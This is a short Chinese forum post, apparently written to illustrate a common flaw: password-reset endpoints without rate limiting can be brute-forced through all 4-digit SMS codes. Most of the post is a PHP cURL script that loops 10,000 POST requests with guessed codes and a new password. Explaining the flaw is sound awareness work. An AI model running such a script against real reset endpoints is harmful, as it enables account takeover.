我刚想到一个普遍存在的重置密码的BUG
我想表达的是:我见过很多人没有做限制,我不是问解决方案!!!
我表达的不是很清楚,有些人好像没有明白意思,我用代码实现
前提:没有限流、验证的中小型项目
假设,修改密码接口需要手机号+验证码+新密码且没有任何限流措施,我只需发送一次短信,然后我循环10000次修改接口,验证码从0001、0002一直到9998、9999
<?php
$curl = curl_init();
for ($i = 0; $i < 10000; $i++) {
curl_setopt($curl, CURLOPT_URL, '修改密码接口url');
//设置头文件的信息作为数据流输出
curl_setopt($curl, CURLOPT_HEADER, 1);
//设置获取的信息以文件流的形式返回,而不是直接输出。
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
//设置post方式提交
curl_setopt($curl, CURLOPT_POST, 1);
$post_data = [
"mobile" => "18366666666",
"sms_code" => $i,
"password" => "12345678"
];
curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
$data = curl_exec($curl);
print_r($data);
}
curl_close($curl);
推荐文章: